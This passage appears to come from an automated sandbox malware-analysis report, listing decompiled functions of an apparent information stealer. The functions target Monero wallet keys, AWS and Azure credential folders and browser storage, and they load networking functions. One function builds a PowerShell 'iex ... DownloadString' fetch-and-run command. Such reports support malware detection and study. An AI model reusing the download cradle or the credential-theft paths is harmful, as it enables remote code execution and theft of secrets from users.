                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$FolderPathlstrcat
                            • String ID: \..\
                            • API String ID: 2938889746-4220915743
                            • Opcode ID: bac58dbd4282dc5f6b6a9acafa938fecd7f561fbf2098ece6e4ddb07e4f5559d
                            • Instruction ID: e53bf108801c16b6b92c972f7b7f615484f31b1871386e4e6bb2ade0232d47a8
                            • Opcode Fuzzy Hash: bac58dbd4282dc5f6b6a9acafa938fecd7f561fbf2098ece6e4ddb07e4f5559d
                            • Instruction Fuzzy Hash: 84F1AE70D01626AFCB22EF78E849BAE7BB8AF14305F048169F855A7261DB34DD45CB90
                            Function 001344D0 Relevance: 49.3, APIs: 26, Strings: 2, Instructions: 334stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00134503
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00134536
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013455E
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00134569
                            • lstrlen.KERNEL32(\storage\default\), ref: 00134574
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00134591
                            • lstrcat.KERNEL32(00000000,\storage\default\), ref: 0013459D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001345C6
                            • lstrcat.KERNEL32(00000000,00000000), ref: 001345D1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001345F8
                            • lstrcpy.KERNEL32(00000000,?), ref: 00134637
                            • lstrcat.KERNEL32(00000000,?), ref: 0013463F
                            • lstrlen.KERNEL32(0015179C), ref: 0013464A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00134667
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 00134673
                            • lstrlen.KERNEL32(.metadata-v2), ref: 0013467E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013469B
                            • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 001346A7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001346CE
                            • lstrcpy.KERNEL32(00000000,?), ref: 00134700
                            • GetFileAttributesA.KERNEL32(00000000), ref: 00134707
                            • lstrcpy.KERNEL32(00000000,?), ref: 00134761
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013478A
                            • lstrcpy.KERNEL32(00000000,?), ref: 001347B3
                            • lstrcpy.KERNEL32(00000000,?), ref: 001347DB
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 0013480F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                            • String ID: .metadata-v2$\storage\default\
                            • API String ID: 1033685851-762053450
                            • Opcode ID: 6cbe061ba6e5f5cdedf2c2c0206041977db2bb768f18739c06f5a202ab1259d8
                            • Instruction ID: 8f80f43726009a4f505ed39b6710e3132537c30b5d00a1245b29a42bb8dca32d
                            • Opcode Fuzzy Hash: 6cbe061ba6e5f5cdedf2c2c0206041977db2bb768f18739c06f5a202ab1259d8
                            • Instruction Fuzzy Hash: C7B1E330A11736ABCB22EF74ED4AAAE77B8AF15305F041125F806E7661DB34ED518B90
                            Function 00135900 Relevance: 45.5, APIs: 30, Instructions: 486stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00135935
                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00135964
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00135995
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001359BD
                            • lstrcat.KERNEL32(00000000,00000000), ref: 001359C8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001359F0
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00135A28
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00135A33
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00135A58
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00135A8E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00135AB6
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00135AC1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00135AE8
                            • lstrlen.KERNEL32(0015179C), ref: 00135AFA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00135B19
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 00135B25
                            • lstrlen.KERNEL32(013FD328), ref: 00135B34
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00135B57
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00135B62
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00135B8C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00135BB8
                            • GetFileAttributesA.KERNEL32(00000000), ref: 00135BBF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00135C17
                            • lstrcpy.KERNEL32(00000000,?), ref: 00135C8D
                            • lstrcpy.KERNEL32(00000000,?), ref: 00135CB6
                            • lstrcpy.KERNEL32(00000000,?), ref: 00135CE9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00135D15
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00135D4F
                            • lstrcpy.KERNEL32(00000000,?), ref: 00135DAC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00135DD0
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                            • String ID:
                            • API String ID: 2428362635-0
                            • Opcode ID: ae290131f0cd325a797259ae0fbc6c40d31c9c2a657d92d78a11398cff400630
                            • Instruction ID: 9dcb05969849f9046161f37dac857a20b8cd476d7a00191baeaf84075d935a6e
                            • Opcode Fuzzy Hash: ae290131f0cd325a797259ae0fbc6c40d31c9c2a657d92d78a11398cff400630
                            • Instruction Fuzzy Hash: E502E670A01B26EFCB22EF68D889AAE7BFAAF14704F144529F805D7250DB34DD45CB90
                            Function 00121190 Relevance: 42.3, APIs: 22, Strings: 2, Instructions: 280stringfileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00121120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00121135
                              • Part of subcall function 00121120: RtlAllocateHeap.NTDLL(00000000), ref: 0012113C
                              • Part of subcall function 00121120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00121159
                              • Part of subcall function 00121120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00121173
                              • Part of subcall function 00121120: RegCloseKey.ADVAPI32(?), ref: 0012117D
                            • lstrcat.KERNEL32(?,00000000), ref: 001211C0
                            • lstrlen.KERNEL32(?), ref: 001211CD
                            • lstrcat.KERNEL32(?,.keys), ref: 001211E8
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 0012121F
                            • lstrlen.KERNEL32(013F8FF8), ref: 0012122D
                            • lstrcpy.KERNEL32(00000000,?), ref: 00121251
                            • lstrcat.KERNEL32(00000000,013F8FF8), ref: 00121259
                            • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 00121264
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00121288
                            • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 00121294
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001212BA
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 001212FF
                            • lstrlen.KERNEL32(013FD448), ref: 0012130E
                            • lstrcpy.KERNEL32(00000000,?), ref: 00121335
                            • lstrcat.KERNEL32(00000000,?), ref: 0012133D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00121378
                            • lstrcat.KERNEL32(00000000), ref: 00121385
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001213AC
                            • CopyFileA.KERNEL32(?,?,00000001), ref: 001213D5
                            • lstrcpy.KERNEL32(00000000,?), ref: 00121401
                            • lstrcpy.KERNEL32(00000000,?), ref: 0012143D
                              • Part of subcall function 0013EFC0: lstrcpy.KERNEL32(00000000,?), ref: 0013EFF2
                            • DeleteFileA.KERNEL32(?), ref: 00121471
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                            • String ID: .keys$\Monero\wallet.keys
                            • API String ID: 2881711868-3586502688
                            • Opcode ID: f1d63e6e69607b085cc84ca4ecc894528ec5918d07e9159dd49f987549b25a9f
                            • Instruction ID: 8f49b7b65ca1504aecfeb4247e2f015dc99630ef5218fbac6f18abd7d785785b
                            • Opcode Fuzzy Hash: f1d63e6e69607b085cc84ca4ecc894528ec5918d07e9159dd49f987549b25a9f
                            • Instruction Fuzzy Hash: D5A1B231A01236BBCB22EF74FC8AA9E77B9AF68311F040124F905E7651DB34DE558B90
                            Function 0013E900 Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 199stringCOMMON
                            Download Yara Rule
                            APIs
                            • memset.MSVCRT ref: 0013E920
                            • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0013E949
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013E97F
                            • lstrcat.KERNEL32(?,00000000), ref: 0013E98D
                            • lstrcat.KERNEL32(?,\.azure\), ref: 0013E9A6
                            • memset.MSVCRT ref: 0013E9E5
                            • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0013EA0D
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013EA3F
                            • lstrcat.KERNEL32(?,00000000), ref: 0013EA4D
                            • lstrcat.KERNEL32(?,\.aws\), ref: 0013EA66
                            • memset.MSVCRT ref: 0013EAA5
                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0013EAD1
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013EB00
                            • lstrcat.KERNEL32(?,00000000), ref: 0013EB0E
                            • lstrcat.KERNEL32(?,\.IdentityService\), ref: 0013EB27
                            • memset.MSVCRT ref: 0013EB66
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$memset$FolderPathlstrcpy
                            • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                            • API String ID: 4067350539-3645552435
                            • Opcode ID: 95f0862ac65ecadd0658257954f205c3a97798a4127909abd3080043ea2e0523
                            • Instruction ID: 00b54060053633a0164c9eeb16739f8de794075995b29afe3a972754409bdb99
                            • Opcode Fuzzy Hash: 95f0862ac65ecadd0658257954f205c3a97798a4127909abd3080043ea2e0523
                            • Instruction Fuzzy Hash: A971D771E50339ABDB21EB64DC46FED7778AF58701F000895B619AB1C0DF709E888B94
                            Function 001449F0 Relevance: 38.5, APIs: 11, Strings: 11, Instructions: 48libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryA.KERNEL32(ws2_32.dll,?,001373E4), ref: 001449F6
                            • GetProcAddress.KERNEL32(00000000,connect), ref: 00144A0C
                            • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 00144A1D
                            • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00144A2E
                            • GetProcAddress.KERNEL32(00000000,htons), ref: 00144A3F
                            • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 00144A50
                            • GetProcAddress.KERNEL32(00000000,recv), ref: 00144A61
                            • GetProcAddress.KERNEL32(00000000,socket), ref: 00144A72
                            • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 00144A83
                            • GetProcAddress.KERNEL32(00000000,closesocket), ref: 00144A94
                            • GetProcAddress.KERNEL32(00000000,send), ref: 00144AA5
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                            • API String ID: 2238633743-3087812094
                            • Opcode ID: d41bf85e3790b720d50d76a56cd236852fab108a57bed2fee1ff5fa70ba11cd8
                            • Instruction ID: 7b4c76035cec332cc3e2510a4ad95f85d0cd702b4845d047dfdda8d5f18aecf0
                            • Opcode Fuzzy Hash: d41bf85e3790b720d50d76a56cd236852fab108a57bed2fee1ff5fa70ba11cd8
                            • Instruction Fuzzy Hash: BB113671952B60EBC7129BB4AC5EB5A3EBDBA09707B050C1BB961A71B0DBF44404EB50
                            Function 0013BF70 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 203stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 0013BFA3
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 0013BFD6
                            • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 0013BFE1
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013C001
                            • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 0013C00D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013C030
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0013C03B
                            • lstrlen.KERNEL32(')"), ref: 0013C046
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013C063
                            • lstrcat.KERNEL32(00000000,')"), ref: 0013C06F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013C096
                            • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 0013C0B6
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013C0D8
                            • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 0013C0E4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013C10A
                            • ShellExecuteEx.SHELL32(?), ref: 0013C15C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                            • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            • API String ID: 4016326548-898575020
                            • Opcode ID: 82110069cb1d7e7506d02e49de4b6a0040a0d307b05b17aa5339cea262fee0ab
                            • Instruction ID: de405a71c95b1d19e59b97393fd02c5cb3b89891851254d5ebd865ff315bb0f5
                            • Opcode Fuzzy Hash: 82110069cb1d7e7506d02e49de4b6a0040a0d307b05b17aa5339cea262fee0ab
                            • Instruction Fuzzy Hash: A361B330E11366EBCB22AFB4AC8A6AF7BB9AF15305F041425F815F7261DB34C9558BD0
                            Function 0013AD02 Relevance: 31.5, APIs: 25, Instructions: 297stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32 ref: 0013AD1F
                            • lstrlen.KERNEL32(013FE298), ref: 0013AD35
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013AD5D
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0013AD68
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013AD91
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013ADD4
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0013ADDE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013AE07
                            • lstrlen.KERNEL32(00154ADC), ref: 0013AE21
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013AE43
                            • lstrcat.KERNEL32(00000000,00154ADC), ref: 0013AE4F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013AE78
                            • lstrlen.KERNEL32(00154ADC), ref: 0013AE8A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013AEAC
                            • lstrcat.KERNEL32(00000000,00154ADC), ref: 0013AEB8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013AEE1
                            • lstrlen.KERNEL32(013FE2C8), ref: 0013AEF7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013AF1F
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0013AF2A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013AF53
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013AF8F
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0013AF99
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013AFBF
                            • lstrlen.KERNEL32(00000000), ref: 0013AFD5
                            • lstrcpy.KERNEL32(00000000,013FE1C0), ref: 0013B008
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
